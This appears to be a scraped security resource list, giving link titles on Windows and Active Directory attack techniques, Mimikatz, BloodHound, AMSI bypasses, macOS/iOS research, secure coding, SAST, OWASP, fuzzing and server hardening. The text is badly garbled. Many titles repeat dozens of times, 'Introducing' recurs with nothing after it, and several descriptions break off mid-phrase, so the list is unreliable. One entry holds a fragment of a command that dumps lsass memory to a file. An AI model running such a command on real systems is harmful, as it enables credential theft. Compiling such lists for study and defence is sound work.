- Have you ever wondered what happens behind the scenes when you type your password into the Windows logon screen and hit enter?
- Certify SSL Manager
- Bypassing Credential Guard
- WSUS Attacks Part 1: Introducing PyWSUS
- This is about adding a $ account and have it not show up in net users.
- pestudio
- PEview version
- FileAlyzer
- NTCore
- exeinfo
- Sysmon Internals
- Windows-driver-samples - only driver samples.
- PVE CA Cert List Utility - to-expire certificates
- Release the Kraken: Fileless injection into Windows Error Reporting service
- Windows security baselines
- The Poisoned Postman: Detecting Manipulation of Compliance Features in a Microsoft Exchange Online Environment
- Block process creations originating from PSExec and WMI commands
- VDM
- Live Patching Windows API Calls Using PowerShell
- fibratus
- Adventures in Dynamic Evasion
- Fully working SMB protocol implementation in webassembly
- Parent Process vs. Creator Process
- WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732)
- ntvdmx64
- Spectre exploits in the "wild"
- Security rapid modernization plan
- Windows & Active Directory Exploitation Cheat Sheet and Command Reference
- Finding writable folders and hijackable DLLs
- Do You Really Know About LSA Protection (RunAsPPL)? - lsa-protection-in-userland/) [PPLdump](https://github.com/itm4n/PPLdump): Dump the memory of a PPL with a userland exploit. [comments](https://twitter.com/itm4n/status/1385218719320875009)
- Running NetworkMiner in Windows Sandbox
- GetTempPathW function
- No Longer Just Theory: Black Lotus Labs Uncovers Linux Executables Deployed As Stealth Windows Loaders
- Human-operated ransomware - operated ransomware is a large and growing attack trend that represents a threat to organizations in every industry.
- Sharing the first SimuLand dataset to expedite research and learn about adversary tradecraft
- Microsoft Security Best Practices
- Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory
- EVERYONE GETS A ROOTKIT - based Devices Since Windows 8.
- Backdoor .NET assemblies with… dnSpy
- If you ever see RDP events, you should parse out the RDP bitmap cache. It maps out bitmap images of a user's RDP session.
- Here are a few tool resources for using WinRM w/o PowerShell
- winrs
- Scripting in Windows Remote Management
- pywinrm
- Abusing Windows Remote Management (WinRM) with Metasploit
- Attacking RDP from Inside - card hijacking, unauthorized file system access to client machines and more
- Dynamic Invocation in .NET to bypass hooks
- LowBox Token Permissive Learning Mode
- DInjector
- Windows Kernel Introspection (WKI)
- Windows Persistence Techniques
- Gaining Domain Admin from Outside Active Directory - NS/mDNS Poisoner and NTLMv1/2 Relay)
- Low Privilege Active Directory Enumeration from a non-Domain Joined Host
- Active Directory as a C2
- Escalating privileges with ACLs in Active Directory
- #TR19 Active Directory Security Track
- Penetration Testing Active Directory, Part I
- Penetration Testing Active Directory, Part II - level, forcing us to do privilege escalation.
- Wagging the Dog - Based Constrained Delegation to Attack Active Directory.
- Exploiting PrivExchange
- BloodHound Database Creator
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- ATTACK MAPPING WITH BLOODHOUND
- BloodHound.py
- Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT) - [The Hacker Recipes](https://github.com/ShutdownRepo/The-Hacker-Recipes):
- Using Kerberos for Authentication Relay Attacks
- Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT)
- Kerberos Resource-Based Constrained Delegation
- Kerberos cheatsheet
- Bypassing AD account lockout for a compromised account
- Azure AD and ADFS best practices
- Domain Goodness
- LDAP Ping and Determining Your Machine’s Site
- Non-Admin NTLM Relaying & ETERNALBLUE Exploitation
- Active Directory administrative tier model
- Hunting for reconnaissance activities using LDAP search filters
- Faking an AD account password change is possible , but detectable.
- Building Free Active Directory Lab in Azure
- Configure the log analytics wizard
- Reset the krbtgt account password/keys
- GetNPUsers & Kerberos Pre-Auth Explained
- Vulnerable-AD
- EXTRACTING PASSWORD HASHES FROM THE NTDS.DIT FILE
- Active Directory Lab Setup Tool
- Enabling Active Directory DNS query logging
- Detecting CVE-2020-1472 (CISA ED 20-04) Using Splunk Attack Range
- Still Passing the Hash 15 Years Later
- Detecting Abuse of Authentication Mechanisms
- Detecting the Elusive: Active Directory Threat Hunting
- Exporting AD FS certificates revisited: Tactics, Techniques and Procedures
- GPO Abuse: “You can’t see me”
- SERVER (UN)TRUST ACCOUNT
- Active Directory Certificate Services (ADCS - PKI) domain admin vulnerability
- Cobalt strike MANUALS_V2
- Active Directory (Attack & Defense )
- Your Azure AD Connect server ... it's a Tier 0 asset
- Shooting Up: On-Prem to Cloud — Detecting “AADConnect” Creds Dump
- From Zero to Domain Admin
- Attacking Active Directory: 0 to 0.9
- Offensive WMI - Active Directory Enumeration - Part [2](https://0xinfection.github.io/posts/wmi-classes-methods-part-2/), [3](https://0xinfection.github.io/posts/wmi-registry-part-3/), [4](https://0xinfection.github.io/posts/wmi-recon-enum/) and [5](https://0xinfection.github.io/posts/wmi-ad-enum/).
- SID filter as security boundary between domains? (Part 7) - Trust account attack - from trusting to trusted
- Harvesting Active Directory credentials via HTTP Request Smuggling
- Protection of privileged users and groups by Azure AD Restricted Management Administrative Units
- Walk-through Mimikatz sekurlsa module
- Mimikatz: Mitigando ataques de roubo de credenciais
- PERFORMING PASS-THE-HASH ATTACKS WITH MIMIKATZ
- Protecting RDP Passwords from Mimikatz Using Remote Credential Guard
- Updating Mimikatz in Metasploit
- Capturing Credentials with mimikatz
- Dumping User Passwords from Windows Memory with Mimikatz
- CredentialDumping without Mimikatz - Process lsass).Id Temp\<NAME>.dmp full;Wait-Process -Id (Get-Process rundll32).id```
- Dumping Lsass Without Mimikatz
- PowerShell Gallery
- Example of Malicious DLL Injected in PowerShell
- POWERSHELL LOGGING: OBFUSCATION AND SOME NEW(ISH) BYPASSES PART 1
- DevSec Defense - How DevOps Practices Can Drive Detection Development For Defenders
- Geeking out with UEFI, again
- PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection
- PowerShell Obfuscation
- Basic PowerShell for Pentesters
- Understanding and Bypassing AMSI
- Exploring PowerShell AMSI and Logging Evasion
- AMSI.fail
- INTRODUCTION TO SANDBOX EVASION AND AMSI BYPASSES
- comsvcs MiniDump examples
- Beginning PowerShell Empire - Packet Analysis
- Detailed properties in the Office 365 audit log
- Office 365 Mail Forwarding Rules (and other Mail Rules too)
- Application Guard for Office (public preview) for admins
- Exploiting MFA Inconsistencies on Microsoft Services
- Making Clouds Rain :: Remote Code Execution in Microsoft Office 365
- How to hunt for LDAP reconnaissance within M365 Defender?
- Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs
- Reproducing The ProxyShell Pwn2Own Exploit
- ProxyLogon is Just the Tip of the Iceberg
- PROXYTOKEN: AN AUTHENTICATION BYPASS IN MICROSOFT EXCHANGE SERVER
- How Default Permissions on Microsoft Power Apps Exposed Millions
- Excel Recipe: Some VBA Code with a Touch of Excel4 Macro
- An XML-Obfuscated Office Document (CVE-2021-40444)
- Simple Analysis Of A CVE-2021-40444 .docx Document
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Release the Kraken: Fileless injection into Windows Error Reporting service
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- Windows Privilege Escalation (Unquoted Path Service)
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Understanding WdBoot (Windows Defender ELAM)
- Five PE Analysis Tools Worth Looking At
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Updating Mimikatz in Metasploit
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- CA configuration
- Six Facts about Address Space Layout Randomization on Windows
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- How to bypass Defender in a few easy steps
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Certificate Services (AD-CS)
- Certificate templates
- Access controls
- Web endpoints
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Windows Debugger API — The End of Versioned Structures
- Event Log Explorer™ for Windows event log analysis
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Preventing Mimikatz Attacks – Blue Team – Medium
- Updating Mimikatz in Metasploit
- There’s multiple threat actors using OneDrive in campaigns, straight up just linking OneDrive.
- All Your (d)Base Are Belong To Us, Part 2: Code Execution in Microsoft Office (CVE-2021–38646)
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- CA configuration
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Reset the krbtgt account password/keys
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- INTRODUCTION TO SANDBOX EVASION AND AMSI BYPASSES
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- New Variant of DLL Search Order Hijacking Bypasses Windows 10 and 11 Protections
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- Web endpoints
- Updating Mimikatz in Metasploit
- Basic PowerShell for Pentesters
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Pass the Certificate
- UnPAC the hash
- Shadow Credentials
- Certificate Services (AD-CS)
- Certificate templates
- Access controls
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Updating Mimikatz in Metasploit
- EKFiddle
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Windows AllTools
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Updating Mimikatz in Metasploit
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- OffensiveCSharp
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- PowerShell Scripts
- The worst of the two worlds: Excel meets Outlook
- Simple Analysis Of A CVE-2021-40444 .docx Document
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- PowerShell Obfuscation
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Six Facts about Address Space Layout Randomization on Windows
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- PowerShell Obfuscation
- Updating Mimikatz in Metasploit
- Updating Mimikatz in Metasploit
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Case Study: Password Analysis with BloodHound
- Updating Mimikatz in Metasploit
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Introducing BloodHound 4.0: The Azure Update
- Release the Kraken: Fileless injection into Windows Error Reporting service
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Updating Mimikatz in Metasploit
-
macOS/iOS
- Introducing
- Apple Open Source - open-source-mirror/Security): security mirror.
- Apple Lightning (cont.) - serial number reading
- Inside Code Signing
- Disabling MacOS SIP via a VirtualBox kext Vulnerability
- Remote Mac Exploitation Via Custom URL Schemes
- The Mac Malware of 2018
- Knowledge is Power! Using the macOS/iOS knowledgeC.db Database to Determine Precise User and Application Usage
- iOS12 Kernelcache Laundering
- inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c
- A sample of the iOS malware - sha256:0d2ee9ade24163613772fdda201af985d852ab506e3d3e7f07fb3fa8b0853560
- Pair Locking your iPhone with Configurator 2
- KTRW
- Privilege Escalation | macOS Malware & The Path to Root Part 2 - Scripts](https://github.com/bp88/JSS-Scripts): Random scripts for use in the Jamf Pro.
- Dylib Hijacking
- iOS Application Injection
- The Mac Malware of 2019 👾
- OSX.EvilQuest Uncovered
- Low-Level Process Hunting on macOS
- CVE-2020–9934: Bypassing TCC
- Attack Secure Boot of SEP
- Sinter - mode security enforcement for macOS. [A user-mode application authorization system for MacOS written in Swift](https://github.com/trailofbits/sinter/)
- macOS-Fortress - Virus On-Demand and On-Access Scanning (PF, squid, privoxy, hphosts, dshield, emergingthreats, hostsfile, PAC file, clamav).
- From zero to tfp0 - Part 1: Prologue
- From zero to tfp0 - Part 2: A Walkthrough of the voucher_swap exploit
- We Hacked Apple for 3 Months: Here’s What We Found
- MACOS INJECTION VIA THIRD-PARTY FRAMEWORKS
- IPv6 security
- All Your Macs Are Belong To Us
- macOS Security Compliance Project
- Introducing
- TrueTree - like output on macOS with additional pid capturing capabilities.
- Zero-Day TCC bypass discovered in XCSSET malware
- Dissecting the Apple M1 GPU, part I - gpu-part-4.html)
- M1RACLES - 2021-30747 is a covert channel vulnerability in the Apple Silicon “M1” chip.
- Vulnerability Spotlight: A deep dive into macOS SMB server
- How to Use Kerberos on macOS
- Bypassing macOS TCC User Privacy Protections By Accident and Design
- Anecdotes About the macOS Sandbox File Limit
- SSD Advisory – macOS Finder RCE
- How malware gets into the App Store and why Apple can't stop that
- Quick Analysis for the SSID Format String Bug
- De Rebus Antiquis - kexec-utils](https://github.com/xerub/ios-kexec-utils), [iRecovery](https://github.com/xerub/irecovery) -> [new repo](https://github.com/Chronic-Dev/libirecovery), iOS [GID Key](https://www.theiphonewiki.com/wiki/GID_Key)
- UTM
- Dissecting TriangleDB, a Triangulation spyware implant
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Who put that in my Full Disk Access list? ssh and Mojave’s privacy protection
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
- Introducing
-
Browsers Addons
- CLIP OS
- How to Get Started With VMware vSphere Security « vMiss.net
- routeros
- bochspwn-reloaded - based instrumentation performing kernel memory taint tracking to detect disclosure of uninitialized memory to ring 3
- CLIP OS
- How to Get Started With VMware vSphere Security « vMiss.net
- Skadi
- taintgrind - tracking plugin for the Valgrind memory checking tool. [gcc + LD_PRELOAD + taintgrind + graphviz](https://gist.github.com/tkchia/8e4ce913ac28f07be64154cff8fef62e)
- UPX - performance executable packer for several executable formats. [repo](https://github.com/upx/upx)
- MF Sniffer
- CLIP OS
- Awesome-Study-Resources-for-Kernel-Hacking
-
UEFI
-
-
Books
- here
- Practical Cryptography for Developers - cryptography-for-developers-book)
- Security Engineering
- The Cyber Plumber's Handbook
- here
- The Book of Secret Knowledge
-
Secure Programming
-
API
- API Security Testing
- The Web API Checklist
- REST API Checklist
- Your Comprehensive Web API Design Checklist
- The Web API Checklist
- Part 2 of 3
- Part 3 of 3
- How to contact Google SRE: Dropping a shell in cloud SQL
- MindAPI
- Part 2 of 3
- How to contact Google SRE: Dropping a shell in cloud SQL
- hack-requests - requests is an http network library for hackers
- Free API and Microservice Books
- MindAPI
- Here you can find a variaty of resources to help you out on the API security path.
- REST API Testing Tutorial
- REST Security Cheat Sheet
- Penetration Testing RESTful Web Services
- The Web API Checklist
- Your Comprehensive Web API Design Checklist
- API Security Testing
- Free API and Microservice Books
- REST API Testing Tutorial
- REST Security Cheat Sheet
- Penetration Testing RESTful Web Services
- RESTful web services penetation testing
- Astra
- Introducing vAPI – an open source lab environment to learn about API security
- OWASP API Security Project
- Part 1 of 3
- Part 3 of 3
-
Tokens
- kcare-uchecker
- What science can tell us about C and C++'s security
- Executable-Space Protection and ASLR
- Gitian - control oriented software distribution method.
- Canarytokens - quick-free-detection.html) [canaryfy](https://github.com/thinkst/canaryfy)
- CANARY FILES: GENERATING FAKE FILES TO DETECT CRITICAL DATA LOSS FROM COMPLEX COMPUTER NETWORKS
- How to Know if Someone Access your Files with Canary Tokens
- Web App Security 101
- part 1
- part 2
- part 3
- Ristretto - malleable encodings.
- SEI CERT C Coding Standard
- MSC24-C. Do not use deprecated or obsolescent functions
- US-CERT: memcpy_s() and memmove_s()
- Field Experience With Annex K — Bounds Checking Interfaces
- rubocop
- Librando - in-time compilers
- Checked C
- Practical case: Buffer Overflow 0x01
- A Git Horror Story
- An Introduction to Dynamic Symbolic Execution and the KLEE Infrastructure
- Tooling for verification of PGP signed commits
- How C array sizes become part of the binary interface of a library
- When the going gets tough
- GTER 47 | GTS 33 - Dia 2 (parte 1)
- HTTP Security Headers - A Complete Guide
- SAFECode - profit organization exclusively dedicated to increasing trust in information and communications technology products and services through the advancement of effective software assurance methods.
- Security Code Review 101
- Elliptic Curve Cryptography Explained
- How to Process Passwords as a Software Developer
- QL
- Sendy is Insecure
- Cheating in Elliptic Curve Billiards 2
- DevSecOps
- Most Popular Analysis Tools by Programming Language
- Deepsource
- A Graduate Course in Applied Cryptography
- Comments on build reproducibility
- Integrating Security in the Development Pipeline
- DazedAndConfused
- kcare-uchecker
- Package Hunter
- What science can tell us about C and C++'s security
- Awesome AppSec
- HTTP Security Headers - A Complete Guide
- What science can tell us about C and C++'s security
- You don’t need reproducible builds.
- huskyCI
-
SAST
- Static analysis powered security scanner for your terraform code
- Coccinelle
- How disable comments make static analysis tools worse
- A Large-Scale Security-Oriented Static Analysis of Python Packages in PyPI
- Potential remote code execution in PyPI
- What's New with SAST + DAST
- DevSecOps with DAST and Security Hub
- Sonarqube Community Branch Plugin
- SAST Analyzers
- Pip-audit - backed tool probes Python environments for vulnerable packages.
- Horusec
- Source Code Analysis Tools
- COVERITY SCAN
- Trojan Source - source)
- Warn users when a PR contains some characters - directional characters can be present but unseen and thus missed during the review. With this PR, we create a list of characters that we want to warn the users about if present in a PR. Since that list is configurable, it can be extended as needed/desired.
- A Guide On Implementing An Effective SAST Workflow
- Static analysis powered security scanner for your terraform code
- Scan - source security audit tool for modern DevOps teams. [sast-scan](https://github.com/ShiftLeftSecurity/sast-scan): A Free & Open Source DevSecOps Platform.
- Coccinelle
- How disable comments make static analysis tools worse
- A Large-Scale Security-Oriented Static Analysis of Python Packages in PyPI
- Potential remote code execution in PyPI
- What's New with SAST + DAST
- DevSecOps with DAST and Security Hub
- Sonarqube Community Branch Plugin
- SAST Analyzers
- Pip-audit - backed tool probes Python environments for vulnerable packages.
- Source Code Analysis Tools
- COVERITY SCAN
- Trojan Source - source)
- Warn users when a PR contains some characters - directional characters can be present but unseen and thus missed during the review. With this PR, we create a list of characters that we want to warn the users about if present in a PR. Since that list is configurable, it can be extended as needed/desired.
- A Guide On Implementing An Effective SAST Workflow
- Coccinelle
- SAST Analyzers
- COVERITY SCAN
- Warn users when a PR contains some characters - directional characters can be present but unseen and thus missed during the review. With this PR, we create a list of characters that we want to warn the users about if present in a PR. Since that list is configurable, it can be extended as needed/desired.
- A Guide On Implementing An Effective SAST Workflow
-
Secure Web dev
- Introduction to OWASP Top 10 2021
- OWASP Web Security Testing Guide - project-web-security-testing-guide/)
- Projects/OWASP Node js Goat Project
- OWASP Risk Assessment Calculator - Calculator)
- OWASP Top 10 Proactive Controls 2018
- Introduction to OWASP Top 10 2021
- OWASP Web Security Testing Guide - project-web-security-testing-guide/)
- OWASP-Web-Checklist
- Projects/OWASP Node js Goat Project
- OWASP Risk Assessment Calculator - Calculator)
- OWASP Top 10 Proactive Controls 2018
- Exploiting OWASP Top 10 API Vulnerabilities
- CheatSheetSeries
- Password Storage Cheat Sheet
- Database Security Cheat Sheet
- OWASP Cornucopia
- The 2021 CWE Most Important Hardware Weaknesses
- secDevLabs
- Secure Modular Runtimes
- WebSecurity Academy
- Prototype pollution – and bypassing client-side HTML sanitizers
- Understanding the CSRF Vulnerability (A Beginner’s Guide)
- VulnyCode
- PwnMachine
- WebSploit Labs
- Introduction - OWASP Cheat Sheet Series
- Stop Password Masking
- Forgot password? Taking over user accounts Kaminsky style
- CWE Top 25 Most Dangerous Software Weaknesses
- Datashare Server Mode
- GitLab analysis of OWASP Top 10 changes from 2004 to 2021
- oxAuth
- Prototype Pollution in Python
- Exploiting OWASP Top 10 API Vulnerabilities
- CheatSheetSeries
- Database Security Cheat Sheet
- OWASP Cornucopia
- The 2021 CWE Most Important Hardware Weaknesses
- Secure Modular Runtimes
- WebSecurity Academy
- Understanding the CSRF Vulnerability (A Beginner’s Guide)
- PwnMachine
- WebSploit Labs
- Stop Password Masking
- Forgot password? Taking over user accounts Kaminsky style
- Datashare Server Mode
- GitLab analysis of OWASP Top 10 changes from 2004 to 2021
- oxAuth
- Prototype Pollution in Python
- Exploiting OWASP Top 10 API Vulnerabilities
- Database Security Cheat Sheet
- The 2021 CWE Most Important Hardware Weaknesses
- Secure Modular Runtimes
- Datashare Server Mode
- Prototype pollution – and bypassing client-side HTML sanitizers
- Understanding the CSRF Vulnerability (A Beginner’s Guide)
- OWASP-Testing-Checklist
-
Web Training
-
Formal Analysis
- A Formal Analysis of IEEE 802.11's WPA2: Models and Proofs - Usenix2020.pdf)/[video](https://2459d6dc103cb5933875-c0245c5c937c5dedcca3f1764ecc9b2f.ssl.cf2.rackcdn.com/sec20/videos/0812/s1_wireless_security/1_sec20winter-paper653-presentation-video-final.mp4)
- A Formal Analysis of IEEE 802.11's WPA2: Models and Proofs - Usenix2020.pdf)/[video](https://2459d6dc103cb5933875-c0245c5c937c5dedcca3f1764ecc9b2f.ssl.cf2.rackcdn.com/sec20/videos/0812/s1_wireless_security/1_sec20winter-paper653-presentation-video-final.mp4)
- SCYTHE's Community Threats Repository
- A Formal Analysis of IEEE 802.11's WPA2: Models and Proofs - Usenix2020.pdf)/[video](https://2459d6dc103cb5933875-c0245c5c937c5dedcca3f1764ecc9b2f.ssl.cf2.rackcdn.com/sec20/videos/0812/s1_wireless_security/1_sec20winter-paper653-presentation-video-final.mp4)
-
Fuzzing
- afl-unicorn
- Regaxor
- BrokenType
- Dizzy-legacy
- Start-Hollow.ps1
- auditd-attack
- Structure-Aware Fuzzing with libFuzzer - test-suite)
- Generating Software Tests - se/fuzzingbook/))
- afl-unicorn
- Regaxor
- Dizzy-legacy
- Start-Hollow.ps1
- Structure-Aware Fuzzing with libFuzzer - test-suite)
- Fuzzilli
- Materials from Fuzzing Bay Area meetups
- javafuzz - guided fuzzer for testing Java packages.
- onefuzz - hosted Fuzzing-As-A-Service platform.
- Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverage
- rFuss2
- RESTler finds security and reliability bugs through automated fuzzing - fuzzer): is the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services. [REST API Fuzz Testing (RAFT)](https://github.com/microsoft/rest-api-fuzz-testing): Source code for self-hosted service developed for Azure, including the API, orchestration engine, and default set of security tools (including MSR's RESTler), that enables developers to embed security tooling into their CI/CD workflows.
- Dynamic Program Analysis
- Fuzzing the Linux Kernel
- Fuzzing sockets: Apache HTTP, Part 2: Custom Interceptors
- Fuzzing-101
- The Challenges of Fuzzing 5G Protocols
- Fuzzing Workshops
- Introduction to VirtualBox security research
- Fuzzilli
- Materials from Fuzzing Bay Area meetups
- javafuzz - guided fuzzer for testing Java packages.
- Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverage
- Fuzzing sockets: Apache HTTP, Part 2: Custom Interceptors
- Fuzzing-101
- The Challenges of Fuzzing 5G Protocols
- Fuzzing Workshops
- Introduction to VirtualBox security research
- sandsifter
- afl-unicorn
- Start-Hollow.ps1
- Structure-Aware Fuzzing with libFuzzer - test-suite)
- Fuzzing sockets: Apache HTTP, Part 2: Custom Interceptors
- The Challenges of Fuzzing 5G Protocols
- Introduction to VirtualBox security research
- Fuzzing Workshops
-
-
CVEs
-
Hashing
- here
- MikroTik
- Exploit Prediction Scoring System (EPSS) - driven effort for predicting when software vulnerabilities will be exploited. Our goal is to assist network defenders to better prioritize vulnerability remediation efforts.
- here
- TROMMEL
- cve_manager
- dorkbot - line tool to scan Google search results for vulnerabilities.
- NotQuite0DayFriday
- CVE PoC
-
-
Patching
-
Ghidra
- They Did - 2017-11882)
-
-
Hardening
-
Ghidra
- BlueWars
- Get SSH login notification on Telegram
- Implementing Least-Privilege Administrative Models
- Keyringer
- Keystone Project - enclave/)
- nftables
- Common approaches to securing Linux servers and what runs on them.
- Secure & Ad-free Internet Anywhere With Streisand and Pi Hole
- Secure Secure Shell
- Securing Docker Containers - practices around deploying Docker containers in production.](https://github.com/docker/docker-bench-security)
- Hardenize
- Set up two-factor authentication for SSH on Fedora
- Zero-knowledge attestation
- Reverie - knowledge proof system.
- bdshemu
- IPv6 Security Best Practices
- Hardened/PaX Quickstart
- 9 Kubernetes Security Best Practices Everyone Must Follow
- Learn and Test DMARC
- VideoLan Robots.txt
- ssh & linux cheat sheets
- NSA/CISA Kubernetes Hardening Guidance
-
WebServers
- Apache Tomcat Hardening and Security Guide
- How to Configure SSL Certificate on Google Cloud Load Balancer?
- Nginx Web Server Security & Hardening Guide
- IBM HTTP Server Security & Hardening Guide
- How to Enable TLS 1.3 in Nginx, Cloudflare?
- Apache Web Server Hardening & Security Guide
- List of free rfc3161 servers.
- Apache Security
- A new security header: Feature Policy
- How do I prevent apache from serving the .git directory?
- Nginx C function
- NGINX config for SSL with Let's Encrypt certs
- How to Configure Nginx SSL Certifcate Chain
- It's All About Time - A tool for performing feasibility analyses of timing attacks. [TimingIntrusionTool5000](https://github.com/aj-code/TimingIntrusionTool5000): A tool for performing network timing attacks on plaintext and hashed password authentication.
- Decode.Tools
- IT Security Guidelines for Transport Layer Security (TLS)
- CAA Mandated by CA/Browser Forum
- ENVOY - native applications. [code](https://github.com/envoyproxy/envoy)
- NFHTTP
- Security/Server Side TLS
- urlscan.io
- QUIC's combined transport- and cryptographic handshake allows it to be 1 Round Trip faster than TCP + TLS and main problems.
- HTTP/2: The Sequel is Always Worse - 21/briefings/schedule/#http2-the-sequel-is-always-worse-22668)
- A File Format to Aid in Security Vulnerability Disclosure
- security.txt
- 20 Essential Things to Know if You’re on Nginx Web Server
-
-
Tools
-
Satellite
- Using a Hardened Container Image for Secure Applications in the Cloud
- trackerjacker
- Giggity
- bettercap
- Vapor PwnedPasswords Provider
- XPoCe - XPC Snooping utilties for MacOS and iOS (version 2.0)
- WeakNet LINUX 8 - security themed distribution that has been in development since 2010.
- HiTB
